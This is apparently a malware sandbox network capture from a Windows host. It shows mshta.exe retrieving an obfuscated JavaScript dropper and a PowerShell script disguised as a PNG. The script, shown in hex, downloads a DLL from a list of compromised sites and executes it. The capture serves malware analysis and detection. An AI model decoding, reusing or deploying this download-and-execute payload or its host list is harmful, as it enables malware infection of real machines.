                                                                                                                                  Jan 28, 2022 21:04:55.017697096 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.017762899 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.017803907 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.017879963 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.017991066 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.018094063 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.018104076 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.018239975 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.018268108 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.018279076 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.018310070 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.019227028 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.019319057 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.019330978 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.019342899 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.019439936 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.019443035 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.019459963 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.019527912 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.019541025 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.019558907 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.019651890 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.019663095 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.020558119 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.020646095 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.020658970 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.020705938 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.020721912 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.023771048 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.147635937 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.147758007 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.147785902 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.147852898 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.147932053 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.147949934 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.148489952 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.148607016 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.148622036 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.148978949 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.149054050 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.149064064 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.149080992 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.149125099 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.149135113 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.149189949 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.151882887 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:57.370567083 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:57.370646000 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:05:51.849528074 CET804916691.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:05:51.849664927 CET4916680192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:06:26.879585981 CET4916680192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:06:26.938271046 CET804916691.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:06:28.625668049 CET4916780192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:06:29.421094894 CET4916780192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:06:30.996803045 CET4916780192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:06:32.896594048 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:06:33.664750099 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:06:34.117095947 CET4916780192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:06:35.224829912 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:06:38.376245975 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:06:40.373225927 CET4916780192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:06:44.539170980 CET4916880192.168.2.22103.138.189.128

                                                                                                                                  UDP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Jan 28, 2022 21:04:46.893945932 CET5216753192.168.2.228.8.8.8
                                                                                                                                  Jan 28, 2022 21:04:46.912362099 CET53521678.8.8.8192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:48.616856098 CET5059153192.168.2.228.8.8.8
                                                                                                                                  Jan 28, 2022 21:04:49.015062094 CET53505918.8.8.8192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.948641062 CET5780553192.168.2.228.8.8.8
                                                                                                                                  Jan 28, 2022 21:04:52.967462063 CET53578058.8.8.8192.168.2.22

                                                                                                                                  DNS Queries

                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                  Jan 28, 2022 21:04:46.893945932 CET192.168.2.228.8.8.80x3d32Standard query (0)praachichemfood.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 28, 2022 21:04:48.616856098 CET192.168.2.228.8.8.80x352Standard query (0)www.praachichemfood.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 28, 2022 21:04:52.948641062 CET192.168.2.228.8.8.80x9263Standard query (0)dtmconsulting.caA (IP address)IN (0x0001)

                                                                                                                                  DNS Answers

                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                  Jan 28, 2022 21:04:46.912362099 CET8.8.8.8192.168.2.220x3d32No error (0)praachichemfood.com103.138.189.128A (IP address)IN (0x0001)
                                                                                                                                  Jan 28, 2022 21:04:49.015062094 CET8.8.8.8192.168.2.220x352No error (0)www.praachichemfood.compraachichemfood.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Jan 28, 2022 21:04:49.015062094 CET8.8.8.8192.168.2.220x352No error (0)praachichemfood.com103.138.189.128A (IP address)IN (0x0001)
                                                                                                                                  Jan 28, 2022 21:04:52.967462063 CET8.8.8.8192.168.2.220x9263No error (0)dtmconsulting.ca162.241.211.118A (IP address)IN (0x0001)

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • dtmconsulting.ca
                                                                                                                                  • 91.240.118.168
                                                                                                                                  • praachichemfood.com
                                                                                                                                  • www.praachichemfood.com

                                                                                                                                  HTTP Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  0192.168.2.2249169162.241.211.118443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  1192.168.2.224916591.240.118.16880C:\Windows\System32\mshta.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 28, 2022 21:04:41.911645889 CET0OUTGET /zqqw/zaas/fe.html HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  UA-CPU: AMD64
                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                  Host: 91.240.118.168
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 28, 2022 21:04:41.972903013 CET2INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Fri, 28 Jan 2022 20:04:41 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Content-Length: 11027
                                                                                                                                  Last-Modified: Thu, 27 Jan 2022 13:05:00 GMT
                                                                                                                                  Connection: keep-alive
                                                                                                                                  ETag: "61f2987c-2b13"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Data Raw: 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 66 39 32 77 32 38 48 30 31 32 6c 69 35 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 70 32 78 69 46 32 37 45 73 37 51 63 4d 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 70 32 78 69 46 32 37 45 73 37 51 63 4d 5b 30 5d 3d 27 6f 5c 31 36 31 25 33 38 25 33 38 25 33 38 25 33 34 66 25 33 31 27 20 20 20 3b 66 39 32 77 32 38 48 30 31 32 6c 69 35 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7f 5c 5c 7f 31 7f 36 7f 36 7f 25 7f 36 7f 31 7d 18 7f 36 7f 32 7f 25 7f 32 7f 30 7f 71 7f 25 7f 37 7f 39 7f 25 7f 33 7f 37 7d 29 7f 44 7d 22 7d 2b 7f 32 7d 2b 7f 33 7f 42 7d 26 7f 31 7f 79 7d 29 7f 38 7d 2c 7f 25 7f 35 7f 33 7f 74 7d 1f 7f 32 7d 18 7f 35 7f 31 7f 6e 7d 18 7f 34 7d 2f 7f 45 7d 1c 7f 36 7d 3e 7d
                                                                                                                                  Data Ascii: <html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';f92w28H012li5=new Array();p2xiF27Es7QcM=new Array();p2xiF27Es7QcM[0]='o\161%38%38%38%34f%31' ;f92w28H012li5[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'\\166%61}62%20q%79%37})D}"}+2}+3B}&1y})8},%53t}2}51n}4}/E}6}>}
                                                                                                                                  Jan 28, 2022 21:04:41.972925901 CET3INData Raw: 1c 7f 46 7f 6d 7f 43 7d 40 7f 30 7f 61 7d 26 7d 3f 7f 31 7f 30 7f 33 7d 40 7f 37 7d 44 7f 34 7d 1c 7f 35 7d 22 7d 38 7f 33 7f 31 7d 29 7f 33 7d 22 7f 43 7d 29 7d 60 7f 33 7f 30 7d 22 7d 28 7d 32 7d 44 7d 49 7f 31 7f 35 7d 58 7d 19 7d 21 7f 32 7f
                                                                                                                                  Data Ascii: FmC}@0a}&}?103}@7}D4}5}"}831})3}"C})}`30}"}(}2}D}I15}X}}!28}@}f}-}g})}36}j}d3}!3}Z}~}a}yi}"}32|}(7Bq}6}*|}97}5}7}&}wBf}&5nct}9}W}@}}#|\r})|"}82|\nBi}l}]}"1d| 143u}}-6|}&}Z2}G64|1|3|m
                                                                                                                                  Jan 28, 2022 21:04:41.972948074 CET4INData Raw: 7f 20 7b 69 7f 69 7e 36 78 60 7f 48 7f 65 7f 6c 7f 76 7f 65 7e 32 7f 63 78 5f 78 4a 7e 2e 7f 73 7f 2d 7f 73 79 5a 7f 69 7f 66 7f 3b 7f 20 78 50 78 71 7f 69 7f 7a 7f 65 78 59 79 02 7f 70 7f 78 78 76 78 2f 78 31 7f 72 78 59 7f 23 7f 46 77 07 77 08
                                                                                                                                  Data Ascii: {ii~6x`Helve~2cx_xJ~.s-syZif; xPxqizexYypxxvx/x1rxY#Fwwxvbackgro}d-w~Hwx5x7x\'>ThxswrxB x/x$ of z_{. pagxw+pwx|ex,by <b~gxPxJtxLxxww wFCCx8>~#~% Guar{-~.y~xP~g/
                                                                                                                                  Jan 28, 2022 21:04:41.972985029 CET6INData Raw: 38 25 35 46 25 33 31 25 32 39 25 33 42 25 36 43 5c 31 31 31 25 33 44 5c 31 35 34 25 33 34 27 20 20 20 3b 66 75 6e 63 74 69 6f 6e 20 6a 6e 59 34 30 74 70 6a 68 33 44 63 4f 38 37 51 35 4a 28 66 63 6f 73 35 78 4c 29 7b 76 64 44 51 74 30 62 73 62 2b
                                                                                                                                  Data Ascii: 8%5F%31%29%3B%6C\111%3D\154%34' ;function jnY40tpjh3DcO87Q5J(fcos5xL){vdDQt0bsb+=fcos5xL};f92w28H012li5[0]+='xxQx$x/~-~2~4xYn{9wx0wwFwwIx8~refx~p~@/~Bw.w2otv!vM.x/mx x~Ixjx_x~.kx(w[w=vv7xMxxxxSxUxWxYx[wSx^x`xbxdwrxgxix
                                                                                                                                  Jan 28, 2022 21:04:41.973031998 CET7INData Raw: 64 79 7b 72 43 73 6c 72 77 72 79 7b 69 7b 6b 7d 16 7e 57 71 13 77 1d 7d 01 71 13 78 22 7f 64 7f 79 71 13 7f 61 71 13 77 78 7f 67 71 13 7b 2d 7f 76 71 13 73 46 76 5e 71 05 75 30 74 7f 71 05 73 1a 71 2b 7f 6e 7f 70 7f 75 7f 74 71 13 7f 70 71 19 73
                                                                                                                                  Data Ascii: dy{rCslrwry{i{k}~Wqw}qx"dyqaqwxgq{-vqsFv^qu0tqsq+nputqpqs[|\\=rD|\\t$;sxtv((qAue{xlxr~\':|]sZqrzq}\',qYq[s?7q]q_qZq`q^qau5w\\}zak;qPx2qS|]rL}qr{y(38,}Eqw7s@5qw1q{,9pza,{q}nqevMaqhqj 3q
                                                                                                                                  Jan 28, 2022 21:04:41.973053932 CET9INData Raw: 35 46 25 33 31 25 32 42 25 32 42 25 33 43 6c 25 33 38 25 32 39 25 33 42 5c 31 36 36 61 25 37 32 25 32 30 6c 25 33 31 25 33 44 5c 31 35 36 65 5c 31 36 37 25 32 30 5c 31 30 31 72 25 37 32 61 79 25 32 38 25 32 39 25 32 43 6c 25 33 30 25 33 44 5c 31
                                                                                                                                  Data Ascii: 5F%31%2B%2B%3Cl%38%29%3B\166a%72%20l%31%3D\156e\167%20\101r%72ay%28%29%2Cl%30%3D\156%65%77%20\101r\162ay%28%29%2CI%6C%3D%31%32%38%3B%64o%7Bl%30%5B%49l%5D%3D%53tri%6Eg%2E\146r%6F\155Ch\141%72C%6F%64%65%28%49l%29%7D\167%68\151\154%65%28%2D%2D%49
                                                                                                                                  Jan 28, 2022 21:04:41.973093033 CET10INData Raw: 5f 6f 43 6c 22 7f 3d 72 06 7f 7b 6d 74 7e 2f 6c 2b 72 7f 76 4d 6c 2e 6c 08 6c 31 73 35 7f 69 76 1e 7f 74 6d 08 7f 64 6f 7b 6c 34 6c 23 72 0c 6c 38 6e 46 6e 3b 6e 48 6c 45 6c 3e 7f 66 6c 47 6c 21 6c 23 72 13 6c 4b 6d 5c 72 75 3c 6e 52 78 24 74 79
                                                                                                                                  Data Ascii: _oCl"=r{mt~/l+rvMl.ll1s5ivtmdo{l4l#rl8nFn;nHlEl>flGl!l#rlKm\ru<nRx$tymvl,v,lPl@}v;Sixs3pHo`mo;uuncmbrpr(jsSr=oGz_nTv$otUu5dqVDwe})upxjoppmt%t.o0l6sSo=s1}o,s5s7nJs:s<(lvoIfx1pr*25+|8n^lx{kks5ksGk
                                                                                                                                  Jan 28, 2022 21:04:41.973117113 CET11INData Raw: 79 56 68 3a 75 35 68 76 7f 62 67 46 7f 6e 67 48 74 67 68 3e 7f 20 67 2f 68 78 67 4c 7f 20 69 65 67 4f 67 33 67 52 7f 4e 69 43 7f 57 7f 53 74 67 6e 4a 73 47 7f 38 7f 37 7f 29 7f 20 7f 26 67 50 6a 51 7f 28 7f 38 72 13 67 4f 7f 22 7d 05 67 2e 7f 20
                                                                                                                                  Data Ascii: yVh:u5hvbgFngHtgh> g/hxgL iegOg3gRNiCWStgnJsG87) &gPjQ(8rgO"}g. kiJxivx.~>iu4gOgZgcgeg`gu}T4g^g/"xg~}iConvzah)sfgYlhWjwmotgW)iCcfvgYgbgusMg^gxgbfg_gasG5ozff(f9f f#f%ff$rguf&ff,ffg]f\'sGz-f*gb|Gg{f-f
                                                                                                                                  Jan 28, 2022 21:04:41.973145962 CET12INData Raw: 20 20 20 3b 3c 2f 73 63 72 69 70 74 3e 3c 21 2d 2d 71 55 67 78 38 34 62 79 4f 4f 31 34 79 64 31 52 39 2d 2d 3e 3c 73 63 72 69 70 74 3e 62 36 36 42 4e 46 32 41 39 35 65 20 20 20 20 20 20 3d 27 69 76 64 58 6b 78 4b 73 44 44 52 6b 43 66 43 4a 4e 45
                                                                                                                                  Data Ascii: ;</script>...qUgx84byOO14yd1R9--><script>b66BNF2A95e ='ivdXkxKsDDRkCfCJNEHKOSypsOwc' ;cO87Q5JjnY40tpjh3D (imBv32in6Gnf);j103Q (imBv32in6Gnf);jnY40tpjh3DcO87Q5J (fmnc1ak2);hYQHxCYiv95CVv7wB='a7FO47m8dR4qQtPsP7x92zAXx' ;eval(u


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  2192.168.2.224916691.240.118.16880C:\Windows\System32\mshta.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 28, 2022 21:04:46.790334940 CET13OUTGET /zqqw/zaas/fe.png HTTP/1.1
                                                                                                                                  Host: 91.240.118.168
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 28, 2022 21:04:46.848853111 CET14INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Fri, 28 Jan 2022 20:04:46 GMT
                                                                                                                                  Content-Type: image/png
                                                                                                                                  Content-Length: 1190
                                                                                                                                  Last-Modified: Thu, 27 Jan 2022 13:01:02 GMT
                                                                                                                                  Connection: keep-alive
                                                                                                                                  ETag: "61f2978e-4a6"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Data Raw: 24 70 61 74 68 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 51 57 45 52 2e 64 6c 6c 22 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 70 72 61 61 63 68 69 63 68 65 6d 66 6f 6f 64 2e 63 6f 6d 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 53 57 6d 74 65 43 57 42 55 6b 41 38 39 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 73 3a 2f 2f 64 74 6d 63 6f 6e 73 75 6c 74 69 6e 67 2e 63 61 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 64 6b 43 46 77 79 45 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 73 3a 2f 2f 6d 6f 72 74 67 61 67 65 61 64 76 69 73 65 72 2e 64 69 72 65 63 74 6f 72 79 2f 78 77 38 6f 6b 2f 69 63 43 59 64 42 53 70 62 46 72 66 35 73 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 73 3a 2f 2f 77 6f 72 6c 64 61 76 69 61 74 69 6f 6e 68 75 62 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 4c 69 6b 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 3a 2f 2f 62 61 6b 75 6c 74 61 6e 74 65 2e 63 6f 6d 2f 74 65 65 35 6f 65 6f 74 2f 51 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 73 3a 2f 2f 6f 6e 65 77 61 79 6d 65 64 69 61 2e 72 6f 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6b 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 73 3a 2f 2f 6c 6f 64 65 76 37 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 64 70 77 6a 69 4a 69 76 72 70 67 4f 31 46 32 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 73 3a 2f 2f 74 72 6f 63 68 6f 69 38 30 63 6c 75 62 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 36 73 68 6e 52 55 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 73 3a 2f 2f 68 61 69 6c 65 79 77 65 6c 6c 73 2e 63 6f 6d 2f 63 67 69 2d 62 69 6e 2f 4b 4a 55 4f 61 71 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 65 70 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6c 43 34 35 7a 46 73 48 6d 6d 73 4d 44 45 6c 4b 54 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 3a 2f 2f 65 73 74 69 6c 6f 69 6e 64 75 73 74 72 69 61 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 34 39 63 52 4c 65 44 59 71 72 36 75 56 46 37 69 2f 27 3b 0d 0a 24 75 72 6c 31 32 20 3d 20 27 68 74 74 70 73 3a 2f 2f 66 75 74 75 72 65 6c 75 62 65 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 36 47 4c 70 6c 34 65 68 73 64 43 42 58 33 7a 2f 27 3b 0d 0a 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 2c 24 75 72 6c 31 32 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 24 77 65 62 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 70 61 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 47 65 74 2d 49 74 65 6d 20 24 70 61 74 68 29 2e 4c 65 6e 67 74 68 20 2d 67 65 20 33 30 30 30 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 5b 44 69 61 67 6e 6f 73 74 69 63 73 2e 50 72 6f 63 65 73 73 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 7d 0d 0a 20 20 20 63 61 74 63 68 7b 7d 0d 0a
